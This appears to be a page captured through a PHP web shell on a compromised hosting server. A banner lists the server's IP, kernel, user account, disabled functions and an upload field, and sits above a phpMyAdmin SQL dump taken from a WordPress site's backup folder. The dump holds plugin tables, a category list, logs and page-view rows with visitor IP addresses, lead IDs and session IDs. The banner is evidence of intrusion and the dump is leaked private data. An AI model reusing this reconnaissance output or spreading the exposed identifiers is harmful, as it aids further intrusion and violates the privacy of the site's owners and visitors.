| Server IP : 27.254.66.5 / Your IP : 216.73.217.39 Web Server : Apache/2 System : Linux cs82.hostneverdie.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64 User : technic2 ( 1951) PHP Version : 7.4.30 Disable Function : apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode, show_source,sleep,pcntl_exec,virtual,suexec,dbmopen,dl,symlink,disk_free_space,diskfreespace,leak MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/technic2/backups/ |
Upload File : |
-- phpMyAdmin SQL Dump
-- version 4.9.7
-- https://www.phpmyadmin.net/
--
-- Host: localhost
-- Generation Time: May 01, 2022 at 08:43 AM
-- Server version: 10.4.21-MariaDB
-- PHP Version: 7.3.30
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `technicray_www`
--
-- --------------------------------------------------------
--
-- Table structure for table `wp_automatic_amazon_links`
--
CREATE TABLE `wp_automatic_amazon_links` (
`link_url` varchar(500) NOT NULL,
`link_title` varchar(500) NOT NULL,
`link_keyword` varchar(300) NOT NULL,
`link_status` varchar(20) NOT NULL,
`link_id` int(11) NOT NULL,
`link_desc` mediumtext NOT NULL,
`link_price` mediumtext NOT NULL,
`link_img` varchar(750) NOT NULL,
`link_review` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
-- --------------------------------------------------------
--
-- Table structure for table `wp_automatic_articles_keys`
--
CREATE TABLE `wp_automatic_articles_keys` (
`id` int(11) NOT NULL,
`camp_id` int(11) NOT NULL,
`keyword` varchar(200) NOT NULL,
`page_num` int(11) NOT NULL DEFAULT 0,
`status` int(11) NOT NULL DEFAULT 0,
`last_page` int(11) NOT NULL DEFAULT 999,
`articlesbase_lastadd` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
-- --------------------------------------------------------
--
-- Table structure for table `wp_automatic_articles_links`
--
CREATE TABLE `wp_automatic_articles_links` (
`id` int(11) NOT NULL,
`link` varchar(300) NOT NULL,
`keyword` varchar(300) NOT NULL,
`page_num` int(11) NOT NULL,
`status` int(2) NOT NULL DEFAULT 0,
`title` mediumtext NOT NULL,
`bing_cache` mediumtext NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
-- --------------------------------------------------------
--
-- Table structure for table `wp_automatic_cached`
--
CREATE TABLE `wp_automatic_cached` (
`img_id` int(11) NOT NULL,
`img_external` text NOT NULL,
`img_internal` text NOT NULL,
`img_path` text NOT NULL,
`img_hash` varchar(50) NOT NULL,
`img_data_hash` varchar(50) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
-- --------------------------------------------------------
--
-- Table structure for table `wp_automatic_camps`
--
CREATE TABLE `wp_automatic_camps` (
`camp_id` int(11) NOT NULL COMMENT 'Campaign ID',
`camp_name` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_keywords` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_post_title` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_post_content` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_cb_category` varchar(300) COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_replace_link` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_post_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_post_every` int(11) NOT NULL,
`camp_add_star` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_post_category` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_options` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
`feeds` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'Articles',
`camp_search_order` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_amazon_cat` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_youtube_cat` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_youtube_order` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_amazon_region` varchar(50) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
`camp_post_author` int(11) NOT NULL,
`camp_post_custom_k` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_post_custom_v` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_post_exact` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_general` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_post_execlude` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_yt_user` varchar(59) COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_translate_to` varchar(59) COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_translate_from` varchar(59) COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_translate_to_2` varchar(59) COLLATE utf8mb4_unicode_ci NOT NULL,
`camp_post_type` varchar(59) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
-- --------------------------------------------------------
--
-- Table structure for table `wp_automatic_categories`
--
CREATE TABLE `wp_automatic_categories` (
`cat_id` int(11) NOT NULL,
`cat_parent` int(11) NOT NULL DEFAULT 0,
`cat_name` varchar(150) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
--
-- Dumping data for table `wp_automatic_categories`
--
INSERT INTO `wp_automatic_categories` (`cat_id`, `cat_parent`, `cat_name`) VALUES
(1253, 0, 'Arts & Entertainment'),
(1510, 0, 'Betting Systems'),
(1266, 0, 'Business / Investing'),
(1283, 0, 'Computers / Internet'),
(1297, 0, 'Cooking, Food & Wine'),
(1308, 0, 'E-business & E-marketing'),
(1362, 0, 'Education'),
(1332, 0, 'Employment & Jobs'),
(1338, 0, 'Fiction'),
(1340, 0, 'Games'),
(1344, 0, 'Green Products'),
(1347, 0, 'Health & Fitness'),
(1366, 0, 'Home & Garden'),
(1377, 0, 'Languages'),
(1392, 0, 'Mobile'),
(1400, 0, 'Parenting & Families'),
(1408, 0, 'Politics / Current Events'),
(1410, 0, 'Reference'),
(1419, 0, 'Self-Help'),
(1432, 0, 'Software & Services'),
(1461, 0, 'Spirituality, New Age & Alternative Beliefs'),
(1472, 0, 'Sports'),
(1494, 0, 'Travel'),
(1265, 1253, 'Architecture'),
(1259, 1253, 'Art'),
(1254, 1253, 'Body Art'),
(1261, 1253, 'Dance'),
(1263, 1253, 'Fashion'),
(1255, 1253, 'Film & Television'),
(1260, 1253, 'General'),
(1262, 1253, 'Humor'),
(1519, 1253, 'Magic Tricks'),
(1256, 1253, 'Music'),
(1257, 1253, 'Photography'),
(1258, 1253, 'Radio'),
(1264, 1253, 'Theater'),
(1515, 1510, 'Casino Table Games'),
(1517, 1510, 'Football'),
(1511, 1510, 'General'),
(1512, 1510, 'Horse Racing'),
(1514, 1510, 'Lottery'),
(1513, 1510, 'Poker'),
(1516, 1510, 'Soccer'),
(1275, 1266, 'Careers, Industries & Professions'),
(1520, 1266, 'Commodities'),
(1277, 1266, 'Debt'),
(1271, 1266, 'Derivatives'),
(1280, 1266, 'Economics'),
(1268, 1266, 'Equities & Stocks'),
(1267, 1266, 'Foreign Exchange'),
(1270, 1266, 'General'),
(1276, 1266, 'International Business'),
(1278, 1266, 'Management & Leadership'),
(1273, 1266, 'Marketing & Sales'),
(1279, 1266, 'Outsourcing'),
(1274, 1266, 'Personal Finance'),
(1269, 1266, 'Real Estate'),
(1272, 1266, 'Small Biz / Entrepreneurship'),
(1290, 1283, 'Databases'),
(1295, 1283, 'Email Services'),
(1292, 1283, 'General'),
(1285, 1283, 'Graphics'),
(1288, 1283, 'Hardware'),
(1291, 1283, 'Networking'),
(1293, 1283, 'Operating Systems'),
(1287, 1283, 'Programming'),
(1286, 1283, 'Software'),
(1296, 1283, 'System Administration'),
(1294, 1283, 'System Analysis & Design'),
(1289, 1283, 'Web Hosting'),
(1284, 1283, 'Web Site Design'),
(1300, 1297, 'BBQ'),
(1298, 1297, 'Baking'),
(1303, 1297, 'Cooking'),
(1304, 1297, 'Drinks & Beverages'),
(1305, 1297, 'General'),
(1299, 1297, 'Recipes'),
(1306, 1297, 'Regional & Intl.'),
(1301, 1297, 'Special Diet'),
(1302, 1297, 'Special Occasions'),
(1307, 1297, 'Vegetables / Vegetarian'),
(1521, 1297, 'Wine Making'),
(1309, 1308, 'Affiliate Marketing'),
(1311, 1308, 'Article Marketing'),
(1326, 1308, 'Auctions'),
(1330, 1308, 'Banners'),
(1318, 1308, 'Blog Marketing'),
(1323, 1308, 'Classified Advertising'),
(1328, 1308, 'Consulting'),
(1327, 1308, 'Copywriting'),
(1325, 1308, 'Domains'),
(1312, 1308, 'E-commerce Operations'),
(1320, 1308, 'E-zine Strategies'),
(1321, 1308, 'Email Marketing'),
(1324, 1308, 'General'),
(1317, 1308, 'Market Research'),
(1319, 1308, 'Marketing'),
(1322, 1308, 'Niche Marketing'),
(1314, 1308, 'Paid Surveys'),
(1313, 1308, 'Pay Per Click Advertising'),
(1310, 1308, 'Promotion'),
(1315, 1308, 'SEM & SEO'),
(1331, 1308, 'Social Media Marketing'),
(1316, 1308, 'Submitters'),
(1329, 1308, 'Video Marketing'),
(1364, 1362, 'Admissions'),
(1522, 1362, 'Educational Materials'),
(1523, 1362, 'Higher Education'),
(1524, 1362, 'K-12'),
(1365, 1362, 'Student Loans'),
(1363, 1362, 'Test Prep & Study Guides'),
(1335, 1332, 'Cover Letter & Resume Guides'),
(1337, 1332, 'General'),
(1334, 1332, 'Job Listings'),
(1336, 1332, 'Job Search Guides'),
(1333, 1332, 'Job Skills / Training'),
(1339, 1338, 'General'),
(1342, 1340, 'Console Guides & Repairs'),
(1343, 1340, 'General'),
(1341, 1340, 'Strategy Guides'),
(1345, 1344, 'Alternative Energy'),
(1346, 1344, 'Conservation & Efficiency'),
(1525, 1344, 'General'),
(1357, 1347, 'Addiction'),
(1361, 1347, 'Beauty'),
(1359, 1347, 'Dental Health'),
(1348, 1347, 'Diets & Weight Loss'),
(1354, 1347, 'Exercise & Fitness'),
(1360, 1347, 'General'),
(1526, 1347, 'Meditation'),
(1352, 1347, 'Men's Health'),
(1355, 1347, 'Mental Health'),
(1350, 1347, 'Nutrition'),
(1349, 1347, 'Remedies'),
(1527, 1347, 'Sleep and Dreams'),
(1356, 1347, 'Spiritual Health'),
(1351, 1347, 'Strength Training'),
(1353, 1347, 'Women's Health'),
(1358, 1347, 'Yoga'),
(1368, 1366, 'Animal Care & Pets'),
(1371, 1366, 'Crafts & Hobbies'),
(1374, 1366, 'Entertaining'),
(1367, 1366, 'Gardening & Horticulture'),
(1373, 1366, 'General'),
(1376, 1366, 'Homebuying'),
(1369, 1366, 'How-to & Home Improvements'),
(1375, 1366, 'Interior Design'),
(1372, 1366, 'Sewing'),
(1370, 1366, 'Weddings'),
(1391, 1377, 'Arabic'),
(1383, 1377, 'Chinese'),
(1385, 1377, 'English'),
(1378, 1377, 'French'),
(1381, 1377, 'German'),
(1389, 1377, 'Hebrew'),
(1390, 1377, 'Hindi'),
(1382, 1377, 'Italian'),
(1380, 1377, 'Japanese'),
(1387, 1377, 'Other'),
(1386, 1377, 'Russian'),
(1384, 1377, 'Sign Language'),
(1379, 1377, 'Spanish'),
(1388, 1377, 'Thai'),
(1518, 1392, 'Apps'),
(1397, 1392, 'Developer Tools'),
(1395, 1392, 'General'),
(1393, 1392, 'Ringtones'),
(1396, 1392, 'Security'),
(1394, 1392, 'Video'),
(1528, 1400, 'Divorce'),
(1402, 1400, 'Education'),
(1405, 1400, 'Genealogy'),
(1407, 1400, 'General'),
(1406, 1400, 'Marriage'),
(1403, 1400, 'Parenting'),
(1401, 1400, 'Pregnancy & Childbirth'),
(1404, 1400, 'Special Needs'),
(1409, 1408, 'General'),
(1529, 1410, 'Automotive'),
(1412, 1410, 'Catalogs & Directories'),
(1411, 1410, 'Consumer Guides'),
(1413, 1410, 'Education'),
(1418, 1410, 'Etiquette'),
(1416, 1410, 'Gay / Lesbian'),
(1417, 1410, 'General'),
(1414, 1410, 'Law & Legal Issues'),
(1530, 1410, 'The Sciences'),
(1415, 1410, 'Writing'),
(1431, 1419, 'Abuse'),
(1423, 1419, 'Dating Guides'),
(1430, 1419, 'Eating Disorders'),
(1427, 1419, 'General'),
(1420, 1419, 'Marriage & Relationships'),
(1422, 1419, 'Motivational / Transformational'),
(1426, 1419, 'Personal Finance'),
(1531, 1419, 'Public Speaking'),
(1532, 1419, 'Self Defense'),
(1429, 1419, 'Self-Esteem'),
(1421, 1419, 'Stress Management'),
(1425, 1419, 'Success'),
(1428, 1419, 'Time Management'),
(1438, 1432, 'Anti Adware / Spyware'),
(1436, 1432, 'Background Investigations'),
(1460, 1432, 'Communications'),
(1441, 1432, 'Dating'),
(1457, 1432, 'Developer Tools'),
(1456, 1432, 'Digital Photos'),
(1437, 1432, 'Drivers'),
(1453, 1432, 'Education'),
(1448, 1432, 'Email'),
(1433, 1432, 'Foreign Exchange Investing'),
(1445, 1432, 'General'),
(1452, 1432, 'Graphic Design'),
(1446, 1432, 'Hosting'),
(1444, 1432, 'Internet Tools'),
(1447, 1432, 'MP3 & Audio'),
(1458, 1432, 'Networking'),
(1455, 1432, 'Operating Systems'),
(1443, 1432, 'Other Investment Software'),
(1459, 1432, 'Personal Finance'),
(1450, 1432, 'Productivity'),
(1434, 1432, 'Registry Cleaners'),
(1435, 1432, 'Reverse Phone Lookup'),
(1454, 1432, 'Screensavers & Wallpaper'),
(1439, 1432, 'Security'),
(1440, 1432, 'System Optimization'),
(1449, 1432, 'Utilities'),
(1442, 1432, 'Video'),
(1451, 1432, 'Web Design'),
(1465, 1461, 'Astrology'),
(1470, 1461, 'General'),
(1463, 1461, 'Hypnosis'),
(1466, 1461, 'Magic'),
(1462, 1461, 'Numerology'),
(1468, 1461, 'Paranormal'),
(1467, 1461, 'Psychics'),
(1469, 1461, 'Religion'),
(1471, 1461, 'Tarot'),
(1464, 1461, 'Witchcraft'),
(1483, 1472, 'Automotive'),
(1476, 1472, 'Baseball'),
(1485, 1472, 'Basketball'),
(1473, 1472, 'Coaching'),
(1533, 1472, 'Cycling'),
(1491, 1472, 'Extreme Sports'),
(1488, 1472, 'Football'),
(1490, 1472, 'General'),
(1474, 1472, 'Golf'),
(1493, 1472, 'Hockey'),
(1481, 1472, 'Individual Sports'),
(1480, 1472, 'Martial Arts'),
(1492, 1472, 'Mountaineering'),
(1484, 1472, 'Other Team Sports'),
(1482, 1472, 'Outdoors & Nature'),
(1479, 1472, 'Racket Sports'),
(1534, 1472, 'Running'),
(1477, 1472, 'Soccer'),
(1489, 1472, 'Softball'),
(1478, 1472, 'Training'),
(1475, 1472, 'Volleyball'),
(1486, 1472, 'Water Sports'),
(1487, 1472, 'Winter Sports'),
(1535, 1494, 'Africa'),
(1495, 1494, 'Asia'),
(1500, 1494, 'Canada'),
(1503, 1494, 'Caribbean'),
(1499, 1494, 'Europe'),
(1498, 1494, 'General'),
(1501, 1494, 'Latin America'),
(1502, 1494, 'Middle East'),
(1496, 1494, 'Specialty Travel'),
(1497, 1494, 'United States');
-- --------------------------------------------------------
--
-- Table structure for table `wp_automatic_clickbank_links`
--
CREATE TABLE `wp_automatic_clickbank_links` (
`link_url` varchar(500) NOT NULL,
`link_title` varchar(500) NOT NULL,
`link_keyword` varchar(300) NOT NULL,
`link_status` varchar(20) NOT NULL,
`link_id` int(11) NOT NULL,
`link_desc` mediumtext NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
-- --------------------------------------------------------
--
-- Table structure for table `wp_automatic_feeds_links`
--
CREATE TABLE `wp_automatic_feeds_links` (
`camp_id` varchar(150) NOT NULL,
`link` varchar(300) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
-- --------------------------------------------------------
--
-- Table structure for table `wp_automatic_general`
--
CREATE TABLE `wp_automatic_general` (
`id` int(11) NOT NULL,
`item_id` varchar(50) NOT NULL,
`item_type` text NOT NULL,
`item_status` varchar(50) NOT NULL,
`item_data` mediumtext NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
-- --------------------------------------------------------
--
-- Table structure for table `wp_automatic_keywords`
--
CREATE TABLE `wp_automatic_keywords` (
`keyword_id` int(11) NOT NULL,
`keyword_name` varchar(250) NOT NULL,
`keyword_camp` int(11) NOT NULL,
`keyword_start` int(11) NOT NULL DEFAULT 0,
`clickbank_start` int(11) NOT NULL DEFAULT 1,
`amazon_start` int(11) NOT NULL DEFAULT 1
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
-- --------------------------------------------------------
--
-- Table structure for table `wp_automatic_links`
--
CREATE TABLE `wp_automatic_links` (
`link_url` varchar(500) NOT NULL,
`link_title` varchar(500) NOT NULL,
`link_keyword` varchar(300) NOT NULL,
`link_status` varchar(20) NOT NULL,
`link_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
-- --------------------------------------------------------
--
-- Table structure for table `wp_automatic_log`
--
CREATE TABLE `wp_automatic_log` (
`id` int(11) NOT NULL,
`action` varchar(50) NOT NULL,
`data` mediumtext NOT NULL,
`date` timestamp NOT NULL DEFAULT current_timestamp(),
`camp` varchar(20) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
--
-- Dumping data for table `wp_automatic_log`
--
INSERT INTO `wp_automatic_log` (`id`, `action`, `data`, `date`, `camp`) VALUES
(279, '<strong>Cron</strong> >> Processing Campaign:699', '{699}', '2018-01-19 09:05:32', ''),
(280, '<strong>User</strong> >> Processing Campaign:699', '{699}', '2018-01-19 09:05:39', ''),
(281, '<strong>User</strong> >> Processing Campaign:699', '{699}', '2018-01-19 09:11:05', ''),
(282, '<strong>User</strong> >> Processing Campaign:699', '{699}', '2018-01-19 09:11:09', ''),
(283, '<strong>User</strong> >> Processing Campaign:699', '{699}', '2018-01-19 09:12:41', ''),
(284, '<strong>User</strong> >> Processing Campaign:699', '{699}', '2018-01-19 09:12:44', '');
-- --------------------------------------------------------
--
-- Table structure for table `wp_automatic_youtube_links`
--
CREATE TABLE `wp_automatic_youtube_links` (
`link_url` varchar(500) COLLATE utf8mb4_unicode_ci NOT NULL,
`link_title` varchar(500) COLLATE utf8mb4_unicode_ci NOT NULL,
`link_keyword` varchar(300) COLLATE utf8mb4_unicode_ci NOT NULL,
`link_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
`link_id` int(11) NOT NULL,
`link_desc` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
`link_player` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
`link_img` varchar(500) COLLATE utf8mb4_unicode_ci NOT NULL,
`link_rating` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
`link_views` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
`link_time` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL,
`link_author` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL,
`link_duration` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '00:00',
`link_general` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
-- --------------------------------------------------------
--
-- Table structure for table `wp_commentmeta`
--
CREATE TABLE `wp_commentmeta` (
`meta_id` bigint(20) UNSIGNED NOT NULL,
`comment_id` bigint(20) UNSIGNED NOT NULL DEFAULT 0,
`meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
`meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
-- --------------------------------------------------------
--
-- Table structure for table `wp_comments`
--
CREATE TABLE `wp_comments` (
`comment_ID` bigint(20) UNSIGNED NOT NULL,
`comment_post_ID` bigint(20) UNSIGNED NOT NULL DEFAULT 0,
`comment_author` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
`comment_author_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`comment_author_url` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`comment_author_IP` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_content` text COLLATE utf8mb4_unicode_ci NOT NULL,
`comment_karma` int(11) NOT NULL DEFAULT 0,
`comment_approved` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '1',
`comment_agent` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`comment_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`comment_parent` bigint(20) UNSIGNED NOT NULL DEFAULT 0,
`user_id` bigint(20) UNSIGNED NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
-- --------------------------------------------------------
--
-- Table structure for table `wp_inbound_events`
--
CREATE TABLE `wp_inbound_events` (
`id` mediumint(9) NOT NULL,
`event_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
`page_id` mediumint(20) NOT NULL,
`variation_id` mediumint(9) NOT NULL,
`form_id` mediumint(20) NOT NULL,
`cta_id` mediumint(20) NOT NULL,
`email_id` mediumint(20) NOT NULL,
`rule_id` mediumint(20) NOT NULL,
`job_id` mediumint(20) NOT NULL,
`list_id` mediumint(20) NOT NULL,
`lead_id` mediumint(20) NOT NULL,
`comment_id` mediumint(20) NOT NULL,
`lead_uid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
`session_id` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
`event_details` text COLLATE utf8mb4_unicode_ci NOT NULL,
`source` text COLLATE utf8mb4_unicode_ci NOT NULL,
`funnel` text COLLATE utf8mb4_unicode_ci NOT NULL,
`datetime` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
-- --------------------------------------------------------
--
-- Table structure for table `wp_inbound_page_views`
--
CREATE TABLE `wp_inbound_page_views` (
`id` mediumint(9) NOT NULL,
`page_id` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
`cta_id` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
`variation_id` mediumint(9) NOT NULL,
`lead_id` mediumint(20) NOT NULL,
`lead_uid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
`list_id` mediumint(20) NOT NULL,
`session_id` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
`source` text COLLATE utf8mb4_unicode_ci NOT NULL,
`datetime` datetime NOT NULL,
`ip` varchar(45) COLLATE utf8mb4_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
--
-- Dumping data for table `wp_inbound_page_views`
--
INSERT INTO `wp_inbound_page_views` (`id`, `page_id`, `cta_id`, `variation_id`, `lead_id`, `lead_uid`, `list_id`, `session_id`, `source`, `datetime`, `ip`) VALUES
(1, '622', '622', 0, 0, 'Ruxp2dlt0TsxFrcM7zUAKmGF1Xs3Vh38S1T', 0, '8ic0tdq313u746njc2n4201ba3', 'Direct Traffic', '2018-01-15 18:32:38', '192.0.116.114'),
(2, '624', '624', 0, 0, 'Dy4taVaWuMHg7CKANZ8CdFmI1qScStKNBpL', 0, 'gjilun27iq2el4qiu4a3ctu431', 'Direct Traffic', '2018-01-15 18:35:51', '192.0.99.138'),
(3, '622', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:35:56', '192.168.10.71'),
(4, '622', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:36:11', '192.168.10.71'),
(5, '624', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:36:46', '192.168.10.71'),
(6, '624', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:36:46', '192.168.10.71'),
(7, '625', '625', 0, 0, 'S7ELvGr6FErINBrLrt6NGaxsfpRoyMNJKxZ', 0, 'g1gf6p0bcpm9u6u960hs7iqvb5', 'Direct Traffic', '2018-01-15 18:39:55', '192.0.113.50'),
(8, '624', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:40:04', '192.168.10.71'),
(9, '624', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:40:04', '192.168.10.71'),
(10, '625', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:40:33', '192.168.10.71'),
(11, '625', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:40:33', '192.168.10.71'),
(12, '625', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:40:33', '192.168.10.71'),
(13, '625', '625', 0, 0, 'JHe8JrqIIP1XTx4txxGAuaXm9lbeQEwuhUy', 0, 'm8168rscrb9f5cemh7qs70qmj4', 'Direct Traffic', '2018-01-15 18:41:35', '192.0.84.159'),
(14, '625', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:41:36', '192.168.10.71'),
(15, '625', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:41:36', '192.168.10.71'),
(16, '625', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:41:36', '192.168.10.71'),
(17, '626', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:45:11', '192.168.10.71'),
(18, '626', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:45:11', '192.168.10.71'),
(19, '626', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:45:11', '192.168.10.71'),
(20, '626', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:45:11', '192.168.10.71'),
(21, '626', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:45:11', '192.168.10.71'),
(22, '626', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:45:11', '192.168.10.71'),
